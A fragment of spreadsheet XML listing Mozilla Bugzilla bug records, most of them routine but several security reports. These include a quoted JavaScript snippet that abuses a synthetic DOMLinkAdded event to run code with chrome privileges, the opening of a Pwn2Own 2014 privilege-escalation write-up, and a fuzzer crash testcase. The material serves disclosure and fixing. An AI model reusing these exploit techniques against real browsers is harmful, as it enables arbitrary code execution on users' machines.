          <t>FIXED</t>
        </is>
      </c>
      <c r="P3531" t="inlineStr">
        <is>
          <t>[webpayments]</t>
        </is>
      </c>
      <c r="Q3531" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3531" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3531" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T3531" t="n">
        <v>1</v>
      </c>
      <c r="U3531" t="n">
        <v>0</v>
      </c>
      <c r="V3531" t="n">
        <v>7</v>
      </c>
      <c r="W3531" t="inlineStr">
        <is>
          <t>If an error with the shipping address happens and it's isn't a result of a shippingaddresschange event (from the user editing it) then we need to indicate the error on the summary view (rather than preventing the user from leaving the edit screen).
Example:
1) Have only a partial/invalid shipping address in autofill storage
2) Open a Payment Request
3) Address from #1 is chosen by default
4) Don't change the shipping address but complete the request
I don't believe shippingaddresschange should be fired in the above steps but upon payment time the site will get the shipping address and may reject it.</t>
        </is>
      </c>
      <c r="X3531" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3532">
      <c r="A3532" t="n">
        <v>1444415</v>
      </c>
      <c r="B3532" t="inlineStr">
        <is>
          <t>2018-03-09 07:49:29 -0800</t>
        </is>
      </c>
      <c r="C3532" t="inlineStr">
        <is>
          <t>Document the TMO Architecture in docs.TMO</t>
        </is>
      </c>
      <c r="D3532" t="inlineStr">
        <is>
          <t>2023-03-27 08:09:29 -0700</t>
        </is>
      </c>
      <c r="E3532" t="n">
        <v>1</v>
      </c>
      <c r="F3532" t="n">
        <v>1</v>
      </c>
      <c r="G3532" t="n">
        <v>2</v>
      </c>
      <c r="H3532" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3532" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J3532" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3532" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3532" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3532" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3532" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3532" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3532" t="inlineStr"/>
      <c r="Q3532" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3532" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3532" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3532" t="n">
        <v>1</v>
      </c>
      <c r="U3532" t="n">
        <v>0</v>
      </c>
      <c r="V3532" t="n">
        <v>3</v>
      </c>
      <c r="W3532" t="inlineStr">
        <is>
          <t>I wrote an architecture diagram for TMO that would be useful to document in docs.tmo</t>
        </is>
      </c>
      <c r="X3532" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3533">
      <c r="A3533" t="n">
        <v>481506</v>
      </c>
      <c r="B3533" t="inlineStr">
        <is>
          <t>2009-03-04 14:16:34 -0800</t>
        </is>
      </c>
      <c r="C3533" t="inlineStr">
        <is>
          <t>The latest email address filtering changes causes a DoS problem when comments have certain text in them</t>
        </is>
      </c>
      <c r="D3533" t="inlineStr">
        <is>
          <t>2009-03-04 18:38:12 -0800</t>
        </is>
      </c>
      <c r="E3533" t="n">
        <v>1</v>
      </c>
      <c r="F3533" t="n">
        <v>1</v>
      </c>
      <c r="G3533" t="n">
        <v>4</v>
      </c>
      <c r="H3533" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3533" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3533" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3533" t="inlineStr">
        <is>
          <t>3.3.3</t>
        </is>
      </c>
      <c r="L3533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3533" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3533" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3533" t="inlineStr"/>
      <c r="Q3533" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3533" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3533" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T3533" t="n">
        <v>1</v>
      </c>
      <c r="U3533" t="n">
        <v>0</v>
      </c>
      <c r="V3533" t="n">
        <v>17</v>
      </c>
      <c r="W3533" t="inlineStr">
        <is>
          <t>Created attachment 365537
Test script that illustrates issue with certain text and Email::Address
The latest email address filtering changes in cvs causes a DoS problem when comments have certain text in them.
Since bug comments are now filtered using Bugzilla::Util::email_filter,
Email::Address is not able to handle some blocks of text properly and consumes
massive amounts of CPU and also denies access to the bug itself for others.
I am attaching a simple script that has the text from out site that causes the
issue.</t>
        </is>
      </c>
      <c r="X3533" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3534">
      <c r="A3534" t="n">
        <v>147777</v>
      </c>
      <c r="B3534" t="inlineStr">
        <is>
          <t>2002-05-28 21:29:14 -0700</t>
        </is>
      </c>
      <c r="C3534" t="inlineStr">
        <is>
          <t>:visited support allows queries into global history</t>
        </is>
      </c>
      <c r="D3534" t="inlineStr">
        <is>
          <t>2023-01-21 19:13:28 -0800</t>
        </is>
      </c>
      <c r="E3534" t="n">
        <v>1</v>
      </c>
      <c r="F3534" t="n">
        <v>1</v>
      </c>
      <c r="G3534" t="n">
        <v>3</v>
      </c>
      <c r="H3534" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3534" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3534" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K3534" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3534" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3534" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3534" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3534" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3534" t="inlineStr">
        <is>
          <t>[sg:want P1][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting]</t>
        </is>
      </c>
      <c r="Q3534" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3534" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3534" t="inlineStr">
        <is>
          <t>mozilla1.9.3a4</t>
        </is>
      </c>
      <c r="T3534" t="n">
        <v>1</v>
      </c>
      <c r="U3534" t="n">
        <v>51</v>
      </c>
      <c r="V3534" t="n">
        <v>304</v>
      </c>
      <c r="W3534" t="inlineStr">
        <is>
          <t>We should have a pref for :visited support, since there are some things that can
be determined about the user's history (and perhaps used for other exploits if
one knows they use one-click amazon purchasing, or a certain bank, etc.) using
:visited rules.  (These include using GetComputedStyle or using generated
content or 'display: none' to cause server hits.  The latter could be fixed with
a parallel style context tree (in limited cases), which could allow the pref to
disable rules only in author-level stylesheets, but that's quite a bit of work.)</t>
        </is>
      </c>
      <c r="X3534" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3535">
      <c r="A3535" t="n">
        <v>880734</v>
      </c>
      <c r="B3535" t="inlineStr">
        <is>
          <t>2013-06-07 10:01:47 -0700</t>
        </is>
      </c>
      <c r="C3535" t="inlineStr">
        <is>
          <t>New Google Maps does not show/update the map when being loaded or dragged around</t>
        </is>
      </c>
      <c r="D3535" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:00 -0800</t>
        </is>
      </c>
      <c r="E3535" t="n">
        <v>1</v>
      </c>
      <c r="F3535" t="n">
        <v>1</v>
      </c>
      <c r="G3535" t="n">
        <v>3</v>
      </c>
      <c r="H3535" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3535" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3535" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3535" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L3535" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3535" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3535" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3535" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3535" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+]</t>
        </is>
      </c>
      <c r="Q3535" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3535" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3535" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T3535" t="n">
        <v>1</v>
      </c>
      <c r="U3535" t="n">
        <v>0</v>
      </c>
      <c r="V3535" t="n">
        <v>51</v>
      </c>
      <c r="W3535" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20130607 Firefox/24.0 ID:20130607031055 CSet: dc8e78ed8c44
The new Google Maps does not show the map during initial load and does even not get updated when you drag the map around. It stays empty all the time. It works fine in Epiphany on Linux, and also on OS X. Not sure if that is a hardware configuration or not. After turning off hardware acceleration also doesn't help. It stays blank. As I noticed there are situation when the map actually gets shown but I wasn't able to reproduce it yet.
I'm working with a Lenovo X230 on Ubuntu 13.04. Also keep in mind that you need an invitation to use the new Google maps.
Not sure how many people will be affected by this yet, but leaving this up for the drivers to decide how important it is.</t>
        </is>
      </c>
      <c r="X3535" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3536">
      <c r="A3536" t="n">
        <v>1192028</v>
      </c>
      <c r="B3536" t="inlineStr">
        <is>
          <t>2015-08-06 14:43:21 -0700</t>
        </is>
      </c>
      <c r="C3536" t="inlineStr">
        <is>
          <t>ASan: use-after-poison in sec_asn1d_parse_leaf()</t>
        </is>
      </c>
      <c r="D3536" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:49 -0700</t>
        </is>
      </c>
      <c r="E3536" t="n">
        <v>1</v>
      </c>
      <c r="F3536" t="n">
        <v>1</v>
      </c>
      <c r="G3536" t="n">
        <v>3</v>
      </c>
      <c r="H3536" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3536" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3536" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3536" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L3536" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3536" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3536" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3536" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3536" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+] Coordinate landing with Chrome team.</t>
        </is>
      </c>
      <c r="Q3536" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3536" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3536" t="inlineStr">
        <is>
          <t>3.20.1</t>
        </is>
      </c>
      <c r="T3536" t="n">
        <v>1</v>
      </c>
      <c r="U3536" t="n">
        <v>0</v>
      </c>
      <c r="V3536" t="n">
        <v>41</v>
      </c>
      <c r="W3536" t="inlineStr">
        <is>
          <t>Created attachment 8644611
call_stack.txt
Tim shared tools with me from bug 1185033.</t>
        </is>
      </c>
      <c r="X3536" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3537">
      <c r="A3537" t="n">
        <v>561797</v>
      </c>
      <c r="B3537" t="inlineStr">
        <is>
          <t>2010-04-26 10:36:04 -0700</t>
        </is>
      </c>
      <c r="C3537" t="inlineStr">
        <is>
          <t>[SECURITY] checksetup.pl with $use_suexec=1 sets localconfig as world readable</t>
        </is>
      </c>
      <c r="D3537" t="inlineStr">
        <is>
          <t>2010-07-08 04:15:39 -0700</t>
        </is>
      </c>
      <c r="E3537" t="n">
        <v>1</v>
      </c>
      <c r="F3537" t="n">
        <v>1</v>
      </c>
      <c r="G3537" t="n">
        <v>4</v>
      </c>
      <c r="H3537" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3537" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3537" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K3537" t="inlineStr">
        <is>
          <t>3.5.1</t>
        </is>
      </c>
      <c r="L3537" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3537" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3537" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3537" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3537" t="inlineStr">
        <is>
          <t>[doesn't affect 3.4.x or older]</t>
        </is>
      </c>
      <c r="Q3537" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3537" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S3537" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T3537" t="n">
        <v>1</v>
      </c>
      <c r="U3537" t="n">
        <v>0</v>
      </c>
      <c r="V3537" t="n">
        <v>32</v>
      </c>
      <c r="W3537" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9
Build Identifier: 3.6
localconfig is set as world readable (0644) by checksetup.pl's "fixing permissions" section if $suexec is enabled.
Reproducible: Always
Steps to Reproduce:
1. Extract bugzilla 3.6
2. Run ./checksetup.pl to generate localconfig
3. Edit localconfig setting suexec=1 (and other necessary details)
4. Run ./checksetup.pl again
Actual Results:  
$ ls -l localconfig
-rw-r--r-- 1 bugzilla bugzilla 5638 2010-04-26 03:33 localconfig
Expected Results:  
$ ls -l localconfig
-rw-r----- 1 bugzilla bugzilla 5638 2010-04-26 03:33 localconfig
Although the webserver is stopped from serving localconfig via .htaccess (if $create_htaccess = 1) this will not stop other users with shell access gaining the database password.</t>
        </is>
      </c>
      <c r="X3537" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3538">
      <c r="A3538" t="n">
        <v>289961</v>
      </c>
      <c r="B3538" t="inlineStr">
        <is>
          <t>2005-04-11 14:06:52 -0700</t>
        </is>
      </c>
      <c r="C3538" t="inlineStr">
        <is>
          <t>DOMLinkAdded events synthesized by content can make chrome access non-DOM JS property "rel"</t>
        </is>
      </c>
      <c r="D3538" t="inlineStr">
        <is>
          <t>2007-04-01 14:39:43 -0700</t>
        </is>
      </c>
      <c r="E3538" t="n">
        <v>1</v>
      </c>
      <c r="F3538" t="n">
        <v>1</v>
      </c>
      <c r="G3538" t="n">
        <v>3</v>
      </c>
      <c r="H3538" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3538" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3538" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K3538" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3538" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3538" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3538" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3538" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3538" t="inlineStr">
        <is>
          <t>[sg:fix] trunk covered by 289940</t>
        </is>
      </c>
      <c r="Q3538" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3538" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3538" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3538" t="n">
        <v>1</v>
      </c>
      <c r="U3538" t="n">
        <v>0</v>
      </c>
      <c r="V3538" t="n">
        <v>13</v>
      </c>
      <c r="W3538" t="inlineStr">
        <is>
          <t>In bug 289074 comment 56, moz_bug_r_a4@yahoo.com wrote:
# And, if there is no real getter/setter, the user-defined getter/setter will
# be used. (Is this behavior benefited by unsafe_gsfun? if so, already fixed.)
# Thus, the following code can exploit.
#
#   // Body doesn't have |rel| property
#   document.body.__defineGetter__("rel", function() {
#     return { toString : new Script(code) };
#   });
#
#   var event = document.createEvent("Events");
#   event.initEvent("DOMLinkAdded", true, true);
#   document.body.dispatchEvent(event);
Testcase is attachment 180192.
The real fix for this is bug 289940 (or bug 281988).  (Or perhaps also something
to caps -- I'm not sure why |new Script| can be used this way.)  But I'll attach
a patch here to fix just this one case, as we've already done for a bunch of
other cases, since bug 289940 is probably a bit much for 1.0.3.</t>
        </is>
      </c>
      <c r="X3538" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3539">
      <c r="A3539" t="n">
        <v>1091732</v>
      </c>
      <c r="B3539" t="inlineStr">
        <is>
          <t>2014-10-30 10:29:12 -0700</t>
        </is>
      </c>
      <c r="C3539" t="inlineStr">
        <is>
          <t>Don't write JSON as big fat strings in tests</t>
        </is>
      </c>
      <c r="D3539" t="inlineStr">
        <is>
          <t>2016-10-07 07:18:53 -0700</t>
        </is>
      </c>
      <c r="E3539" t="n">
        <v>1</v>
      </c>
      <c r="F3539" t="n">
        <v>1</v>
      </c>
      <c r="G3539" t="n">
        <v>4</v>
      </c>
      <c r="H3539" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3539" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3539" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3539" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3539" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3539" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3539" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3539" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3539" t="inlineStr">
        <is>
          <t>[good first bug]</t>
        </is>
      </c>
      <c r="Q3539" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3539" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3539" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3539" t="n">
        <v>1</v>
      </c>
      <c r="U3539" t="n">
        <v>0</v>
      </c>
      <c r="V3539" t="n">
        <v>9</v>
      </c>
      <c r="W3539" t="inlineStr">
        <is>
          <t>In the early days of switching to Django we would write the mock fixtures (the stuff that pretends we talked to the middleware) as big blobs of JSON as a multiline string. Later we made some changes so that you can write it as a python dict and it would automatically make it a JSON object in the mock fixtures. 
Example that we want to get rid of:
https://github.com/mozilla/socorro/blob/40abbb6cd50c86a82aa9c3122003a539c6494989/webapp-django/crashstats/crashstats/tests/test_views.py#L297-L389
Example of what it should look like:
https://github.com/mozilla/socorro/blob/40abbb6cd50c86a82aa9c3122003a539c6494989/webapp-django/crashstats/crashstats/tests/test_views.py#L279-L295
The reason it's better to write it as a python dict is that it checks for typos automatically (you'll immediately get a clear SyntaxError if you typo a comma) and you get syntax highlighting.</t>
        </is>
      </c>
      <c r="X3539" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3540">
      <c r="A3540" t="n">
        <v>1180882</v>
      </c>
      <c r="B3540" t="inlineStr">
        <is>
          <t>2015-07-06 13:07:38 -0700</t>
        </is>
      </c>
      <c r="C3540" t="inlineStr">
        <is>
          <t>Add _invalid_parameter_noinfo to the signature prefix-list</t>
        </is>
      </c>
      <c r="D3540" t="inlineStr">
        <is>
          <t>2015-07-14 05:30:47 -0700</t>
        </is>
      </c>
      <c r="E3540" t="n">
        <v>1</v>
      </c>
      <c r="F3540" t="n">
        <v>1</v>
      </c>
      <c r="G3540" t="n">
        <v>4</v>
      </c>
      <c r="H3540" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3540" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3540" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3540" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3540" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3540" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3540" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3540" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3540" t="inlineStr"/>
      <c r="Q3540" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3540" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3540" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3540" t="n">
        <v>1</v>
      </c>
      <c r="U3540" t="n">
        <v>0</v>
      </c>
      <c r="V3540" t="n">
        <v>4</v>
      </c>
      <c r="W3540" t="inlineStr">
        <is>
          <t>Bug 1096757 added invalid_parameter_noinfo but there is also a version with an underscore:
[@ _invalid_parameter_noinfo ]</t>
        </is>
      </c>
      <c r="X3540" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3541">
      <c r="A3541" t="n">
        <v>1143194</v>
      </c>
      <c r="B3541" t="inlineStr">
        <is>
          <t>2015-03-13 15:20:02 -0700</t>
        </is>
      </c>
      <c r="C3541" t="inlineStr">
        <is>
          <t>for-of loops should emit trynotes</t>
        </is>
      </c>
      <c r="D3541" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:27 -0700</t>
        </is>
      </c>
      <c r="E3541" t="n">
        <v>1</v>
      </c>
      <c r="F3541" t="n">
        <v>1</v>
      </c>
      <c r="G3541" t="n">
        <v>3</v>
      </c>
      <c r="H3541" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3541" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3541" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3541" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3541" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3541" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3541" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3541" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3541" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q3541" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3541" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3541" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T3541" t="n">
        <v>1</v>
      </c>
      <c r="U3541" t="n">
        <v>0</v>
      </c>
      <c r="V3541" t="n">
        <v>28</v>
      </c>
      <c r="W3541" t="inlineStr">
        <is>
          <t>// jsfunfuzz-generated code
s = newGlobal()
function f(code) {
    try {
        evalcx(code, s)
    } catch (e) {}
}
f(`
    // Randomly chosen test: js/src/jit-test/tests/debug/bug1116103.js
    var g = newGlobal()
    g.parent = this
    g.eval('new Debugger(parent).onExceptionUnwind=function(){}')
    // jsfunfuzz-generated code
    function f() {
        [...[]]
    }
    for (var j = 0; j &lt; 99; ++j) {
        f()
    }
    x = []
    g = this
    Array.prototype.unshift.call(x, '')
    Array.prototype.unshift.call(x, '')
`);
f(`
    for (v of x) {
        try {
            Object.defineProperty(g, "", {
                get: function() {}
            })
        } catch (e) {}
    }
`)
asserts js debug shell on m-c changeset 2795a48dfebe with --fuzzing-safe --no-threads --ion-eager at Assertion failure: data.s.payload.why == why, at dist/include/js/Value.h and crashes js opt shell at a weird memory address with js::Invoke on the stack.
Configure options:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-debug --enable-nspr-build --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/fuzzing/js/compileShell.py -b "--enable-debug --enable-more-deterministic --enable-nspr-build" -r 2795a48dfebe
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/3127df59e0dc
user:        Boris Zbarsky
date:        Fri Dec 12 20:52:40 2014 -0500
summary:     Bug 1110871.  Ion-compile JSOP_SYMBOL.  r=jandem
Setting s-s to be safe because lldb seems to show EXC_BAD_ACCESS with bad address 0x10231bf30.
Boris, is bug 1110871 a likely regressor?</t>
        </is>
      </c>
      <c r="X3541" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3542">
      <c r="A3542" t="n">
        <v>982906</v>
      </c>
      <c r="B3542" t="inlineStr">
        <is>
          <t>2014-03-12 16:01:16 -0700</t>
        </is>
      </c>
      <c r="C3542" t="inlineStr">
        <is>
          <t>privilege content loading (ZDI-CAN-2214)</t>
        </is>
      </c>
      <c r="D3542" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3542" t="n">
        <v>1</v>
      </c>
      <c r="F3542" t="n">
        <v>1</v>
      </c>
      <c r="G3542" t="n">
        <v>3</v>
      </c>
      <c r="H3542" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3542" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3542" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3542" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3542" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3542" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3542" t="inlineStr">
        <is>
          <t>[pwn2own 2014][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q3542" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3542" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3542" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T3542" t="n">
        <v>1</v>
      </c>
      <c r="U3542" t="n">
        <v>0</v>
      </c>
      <c r="V3542" t="n">
        <v>33</v>
      </c>
      <c r="W3542" t="inlineStr">
        <is>
          <t>-----
TL;DR
-----
It is possible for untrusted web content to load a chrome-privileged page by getting JS-implemented WebIDL to call window.open(). A system-principal page loaded in an iframe can then be exploited to bypass the pop-up blocker by invoking document.open() from the unloaded window. This allows web content to open chrome://browser/content/browser.xul in a chrome window with the opener reference pointing to a content iframe. As a result, a user-controlled javascript URI can be loaded with the system principal, which allows arbitrary code execution.
-----------------------------
1. PRIVILEGED CONTENT LOADING
-----------------------------
Chrome pages in Firefox load with the system security principal, which provides access to all browser functionalities, including launching of arbitrary local files with command line arguments. The browser is expected to prevent websites from loading privileged pages, otherwise a UXSS bug may lead to arbitrary code execution.
When window.open() is called, its C++ implementation -- nsGlobalWindow::OpenInternal -- delegates the security check to nsGlobalWindow::SecurityCheckURL:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; nsGlobalWindow.cpp &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
nsGlobalWindow::SecurityCheckURL(const char *aURL)
{
  JSContext       *cxUsed;
  bool             freePass;
  nsCOMPtr&lt;nsIURI&gt; uri;
  if (NS_FAILED(BuildURIfromBase(aURL, getter_AddRefs(uri), &amp;freePass, &amp;cxUsed)))
    return NS_ERROR_FAILURE;
  AutoPushJSContext cx(cxUsed);
  if (!freePass &amp;&amp; NS_FAILED(nsContentUtils::GetSecurityManager()-&gt;
        CheckLoadURIFromScript(cx, uri)))
    return NS_ERROR_FAILURE;
  return NS_OK;
}
